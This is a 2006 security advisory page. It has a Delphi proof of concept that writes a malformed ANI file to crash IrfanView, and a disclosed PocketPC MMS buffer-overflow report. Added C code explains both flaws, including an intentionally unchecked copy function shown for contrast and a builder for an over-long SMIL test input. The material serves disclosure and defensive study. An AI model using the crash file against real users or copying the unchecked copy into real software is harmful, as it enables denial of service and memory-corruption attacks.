IrfanView 3.98 (with plugins) - Access violation when processing ANI image files
Windows Focus
Monday, 14 August 2006
Example (in Delphi):

===============ani.dpr===============

program ani;

{$APPTYPE CONSOLE}

const
  { Output file name; the original listing was missing the quotes. }
  FileName = 'file.ani';
  { Number of bytes in Buf (18 + 5 * 19 = 113). }
  Len = 113;
  { Malformed RIFF/ACON file, kept byte for byte as in the original PoC:
    "RIFF", size 0, "ACON", a chunk with an all-zero id, "LIST" with size 0,
    "fram"/"icon" and trailing icon-like data. }
  Buf = #$52#$49#$46#$46#$00#$00#$00#$00#$41#$43#$4F#$4E#$00#$00#$00#$00#$24#$00+
        #$00#$00#$24#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00+
        #$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00+
        #$4C#$49#$53#$54#$00#$00#$00#$00#$66#$72#$61#$6D#$69#$63#$6F#$6E#$00#$00#$00+
        #$00#$00#$00#$00#$00#$01#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$02#$00+
        #$16#$00#$00#$00#$28#$00#$00#$00#$FF#$FF#$FF#$00#$02#$00#$00#$00#$00#$00#$01;

var
  F: File;
  S: AnsiString;

begin
  { A true constant cannot be passed to BlockWrite's untyped var parameter,
    and passing a long string variable itself would write its pointer rather
    than its bytes: copy the constant into a variable and write from S[1]. }
  S := Buf;
  AssignFile(F, FileName);
  Rewrite(F, 1);                 { record size 1 so Len is in bytes }
  BlockWrite(F, S[1], Len);
  CloseFile(F);
end.

===============ani.dpr===============

1) Compile and run "ani.dpr" with Delphi (writes "file.ani" to the current directory)

2) Open "file.ani" with IrfanView
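The post says only that IrfanView 3.98 faults on this file; it does not name the field that is mishandled. The C below is an added example, not IrfanView's code and not part of the original post: a bounds-checked walk over the top-level RIFF chunks of the same 113 bytes (transcribed from Buf above). It shows what is wrong with them: the RIFF size field is 0 rather than 105, the LIST chunk claims size 0, and the chunk that follows reads the ASCII bytes "icon" as its length (0x6E6F6369), far beyond the 41 bytes that remain. A reader that trusts a chunk size field without the check in ani_walk() walks straight past the end of its buffer. The status codes and the report struct are my own; the format handling is the generic RIFF rule (id, little-endian size, word-aligned body).

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The 113 bytes that ani.dpr writes to file.ani, transcribed from Buf. */
static const uint8_t poc_ani[] = {
    0x52,0x49,0x46,0x46, 0x00,0x00,0x00,0x00, 0x41,0x43,0x4F,0x4E, /* "RIFF", size 0, "ACON" */
    0x00,0x00,0x00,0x00, 0x24,0x00,0x00,0x00,                      /* chunk id 00000000, size 36 */
    0x24,0x00,0x00,0x00, 0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00, /* 36 bytes of chunk body */
    0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,
    0x4C,0x49,0x53,0x54, 0x00,0x00,0x00,0x00,                      /* "LIST", size 0 */
    0x66,0x72,0x61,0x6D, 0x69,0x63,0x6F,0x6E,                      /* "fram", "icon" */
    0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00, 0x01,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00, 0x02,0x00,
    0x16,0x00,0x00,0x00, 0x28,0x00,0x00,0x00, 0xFF,0xFF,0xFF,0x00,
    0x02,0x00,0x00,0x00, 0x00,0x00,0x01
};

typedef struct {
    int      chunks;             /* chunks whose header and body fit in the buffer */
    int      riff_size_mismatch; /* RIFF size field != file length - 8 */
    char     bad_id[5];          /* id of the chunk that failed, "" if none */
    uint32_t bad_size;           /* the size that chunk claimed */
} ani_report;

enum { ANI_OK = 0, ANI_BAD_MAGIC = 1, ANI_TRUNCATED = 2 };

static uint32_t rd32le(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Walk the top-level RIFF chunks of an ANI file without ever reading past len. */
int ani_walk(const uint8_t *buf, size_t len, ani_report *r)
{
    memset(r, 0, sizeof *r);
    if (len < 12 || memcmp(buf, "RIFF", 4) != 0 || memcmp(buf + 8, "ACON", 4) != 0)
        return ANI_BAD_MAGIC;
    /* The RIFF size field is attacker data too: record the inconsistency,
     * but bound the walk by the real length, not by the field. */
    if (rd32le(buf + 4) != len - 8)
        r->riff_size_mismatch = 1;

    size_t off = 12;
    while (off < len) {
        if (len - off < 8)                 /* not even room for id + size */
            return ANI_TRUNCATED;
        memcpy(r->bad_id, buf + off, 4);
        r->bad_id[4] = '\0';
        r->bad_size = rd32le(buf + off + 4);
        /* The check a crashing reader lacks: the body must lie inside the buffer. */
        if (r->bad_size > len - off - 8)
            return ANI_TRUNCATED;
        r->chunks++;
        off += 8 + r->bad_size + (r->bad_size & 1);   /* RIFF bodies are word-aligned */
    }
    r->bad_id[0] = '\0';
    r->bad_size = 0;
    return ANI_OK;
}

size_t ani_poc_len(void) { return sizeof poc_ani; }

int main(void)
{
    ani_report r;
    int st = ani_walk(poc_ani, sizeof poc_ani, &r);
    printf("status %d after %d chunk(s); offending chunk '%s' claims %u bytes\n",
           st, r.chunks, r.bad_id, (unsigned)r.bad_size);
    return 0;
}
```

On the PoC bytes the walk accepts the all-zero chunk and the empty LIST, then stops at "fram" with a claimed size of 1852793193; the same loop without the size check would compute the next offset from that value and read wherever it lands.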
 
PocketPC MMS - Remote Code Injection/Execution Vulnerability and Denial-of-Service
Mobile Threat
Monday, 14 August 2006
Vulnerability Report

-----------------------------

Vendor: Microsoft and ArcSoft
Product: PocketPC OS and MMS Composer
Version(s): MMS Composer: 1.5.5.6, 2.0.0.13 (possible others)
Platform: PocketPC (tested on: WinCE 4.2 and WinCE 4.21, possibly others)
Architecture: ARM

Device(s): HP iPAQ h6315, i-mate PDA2k (OEM: HTC BlueAngel) (possibly others)

Application: MMS User Agent (Inbox application)
Application binary: tmail.exe

-----------------------------

Reporter(s): Collin Mulliner (technical contact)
Prof. Giovanni Vigna

Affiliation: Reliable Software Group, University of California Santa Barbara

-----------------------------

Executive Summary:
Multiple buffer overflows in the MMS parsing code allow
denial-of-service and REMOTE CODE INJECTION/EXECUTION via MMS.

-----------------------------

Disclosure Time Line:
July 12, 2006 : Vulnerability Report to ArcSoft and Microsoft
July 19, 2006 : Reply by ArcSoft and Microsoft
Aug. 02, 2006 : Vendor Provides Bug Fix to OEMs
Aug. 04, 2006 : Public Disclosure at DEFCON-14

-----------------------------

BugFix:
BugFix is awaiting approval by OEMs

-----------------------------

Brief Technical Details:

1.0) UDP port 2948 open on all interfaces

Devices accept WAP Push via UDP port 2948 on the wireless LAN (Wi-Fi)
interface as well. Listening there is unnecessary (MMS notifications arrive
over the cellular bearer) and it lets an attacker on the same Wi-Fi network
deliver the malformed notifications of section 2.1 for Denial-of-Service.

-----------------------------

2.0) Multiple buffer overflows in MMS message parser

MMS Message parts:

2.1) M-Notification.ind
2.2) M-Retrieve.conf (Header)
2.3) M-Retrieve.conf (Body)
2.4) SMIL parser (Message display function)

-----------------------------

2.1) Parser for M-Notification.ind

Buffer overflows in handlers for the following header fields:

1) TransactionID
2) Subject
3) ContentLocation

Application crashes. Non-critical. Denial-of-Service attack possible.
Exploitable via UDP port 2948.

Categorization: MEDIUM (denial-of-service via wireless LAN)

Exploit: Proof-of-Concept available (DoS)

-----------------------------

2.2) Parser for M-Retrieve.conf (Header)

Buffer overflows in handlers for the following header fields:

1) Subject
2) Content-Type (can overwrite return address on stack)
3) start-info parameter of content-type

Application crashes.

Categorization: LOW (exploitation requires control of MMS infrastructure)

-----------------------------

2.3) Parser for M-Retrieve.conf (Body)

Buffer overflows in handlers for the following body fields:

Multi-Part Entry header:
1) Content-Type
2) Content-ID
3) ContentLocation

In all cases it is possible to overwrite the return address.

Categorization: LOW (exploitation requires control of MMS infrastructure)

-----------------------------

2.4) Parser for SMIL (Message display function)

Transported in: M-Retrieve.conf body content

Buffer overflows in handlers for the following parameters:

1) ID parameter of REGION tag
ID="CONTENT": CONTENT is copied into a stack-based variable and can be
arbitrarily long.

2) REGION parameter of TEXT tag
REGION="CONTENT": CONTENT is copied into a stack-based variable and can be
arbitrarily long.

Both overflows allow one to overwrite the return address on the
stack. Both are exploitable and we were able to create a
proof-of-concept exploit. The exploit is triggered by viewing the
malicious MMS message (this is different from other exploits that
require substantial user interaction -- e.g., to install a program).

Overflow happens after 300 bytes in version 1.5.5.6 and after 400
bytes in version 2.0.0.13.

Categorization: CRITICAL (REMOTE CODE EXECUTION)

Exploit: Proof-of-Concept available (code execution)

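The SMIL overflow described in 2.4 is the classic unbounded copy of an attacker-length attribute value into a fixed-size stack buffer; the header-field overflows in 2.1 to 2.3 are the same pattern applied to WSP text strings. The C below is an added example, not code from this advisory or from ArcSoft's MMS Composer, and the page does not describe the real parser's structure: it contains a minimal SMIL attribute extractor (an assumption about the input shape, not a real XML parser), a sketch of the vulnerable copy for contrast that nothing calls, the bounded replacement, and a builder for a constructed SMIL document with an over-long REGION id so the 300-byte and 400-byte thresholds the advisory gives can be checked as buffer sizes. The macro names and function names are mine.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Buffer sizes at which the advisory says the overflow begins:
 * 300 bytes in MMS Composer 1.5.5.6, 400 bytes in 2.0.0.13. */
#define ID_BUF_1556  300
#define ID_BUF_20013 400

/* Locate attribute `name` of the first <tag ...> element in doc.  Returns a
 * pointer to the (unterminated) value and stores its length, or NULL.
 * Deliberately minimal: assumes name="value" in double quotes and no '>'
 * inside attribute values.  It is not the vendor's SMIL parser. */
static const char *smil_find_attr(const char *doc, const char *tag,
                                  const char *name, size_t *vlen)
{
    char open[32];
    snprintf(open, sizeof open, "<%s", tag);
    const char *p = strstr(doc, open);
    if (p == NULL) return NULL;
    const char *end = strchr(p, '>');
    if (end == NULL) return NULL;
    size_t nlen = strlen(name);
    for (const char *q = p + strlen(open) + 1; q + nlen + 1 < end; q++) {
        if (isspace((unsigned char)q[-1]) && strncmp(q, name, nlen) == 0 &&
            q[nlen] == '=' && q[nlen + 1] == '"') {
            const char *v = q + nlen + 2;
            const char *close = memchr(v, '"', (size_t)(end - v));
            if (close == NULL) return NULL;
            *vlen = (size_t)(close - v);
            return v;
        }
    }
    return NULL;
}

/* The pattern the advisory describes (a sketch, not ArcSoft's code): the value
 * goes into a fixed-size stack buffer with no length check, so anything longer
 * than the buffer runs into the saved return address.  Shown for contrast
 * only; nothing in this file calls it. */
void copy_attr_unchecked(const char *v, size_t vlen, char *stackbuf)
{
    memcpy(stackbuf, v, vlen);      /* vlen is attacker-controlled */
    stackbuf[vlen] = '\0';
}

/* Hardened form: check the length against the destination before copying.
 * Returns the copied length, or -1 if the attribute is missing or would not
 * fit together with its terminator. */
int smil_copy_attr(const char *doc, const char *tag, const char *name,
                   char *dst, size_t dstsz)
{
    size_t vlen;
    const char *v = smil_find_attr(doc, tag, name, &vlen);
    if (v == NULL || vlen >= dstsz) return -1;
    memcpy(dst, v, vlen);
    dst[vlen] = '\0';
    return (int)vlen;
}

/* Constructed test input in the shape of the trigger: a SMIL body whose
 * REGION id and TEXT region are `idlen` bytes of 'A' (no payload).
 * Returns 0, or -1 if out cannot hold the document. */
int build_long_region_smil(char *out, size_t outsz, size_t idlen)
{
    static const char pre[]  = "<smil><head><layout><region id=\"";
    static const char mid[]  = "\"/></layout></head><body><par><text region=\"";
    static const char post[] = "\" src=\"t.txt\"/></par></body></smil>";
    size_t need = (sizeof pre - 1) + idlen + (sizeof mid - 1) + idlen + sizeof post;
    if (need > outsz) return -1;
    char *w = out;
    memcpy(w, pre, sizeof pre - 1);  w += sizeof pre - 1;
    memset(w, 'A', idlen);           w += idlen;
    memcpy(w, mid, sizeof mid - 1);  w += sizeof mid - 1;
    memset(w, 'A', idlen);           w += idlen;
    memcpy(w, post, sizeof post);    /* copies the terminating NUL too */
    return 0;
}

int main(void)
{
    char doc[2048], id[ID_BUF_20013];
    build_long_region_smil(doc, sizeof doc, 350);
    printf("350-byte REGION id, 1.5.5.6-sized buffer: %d\n",
           smil_copy_attr(doc, "region", "id", id, ID_BUF_1556));
    printf("350-byte REGION id, 2.0.0.13-sized buffer: %d\n",
           smil_copy_attr(doc, "region", "id", id, ID_BUF_20013));
    return 0;
}
```

A 350-byte id is rejected against the 300-byte buffer and accepted against the 400-byte one, matching the version-dependent thresholds the advisory reports; the fix is the length check in smil_copy_attr(), applied wherever a field of attacker-chosen length lands in a fixed-size buffer, which is also what the TransactionID, Subject, Content-Type and Content-ID handlers in 2.1 to 2.3 need.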
-----------------------------

Related DEFCON-14 slides and Proof-of-Concept DoS tool are available
here:

http://www.mulliner.org/pocketpc/
 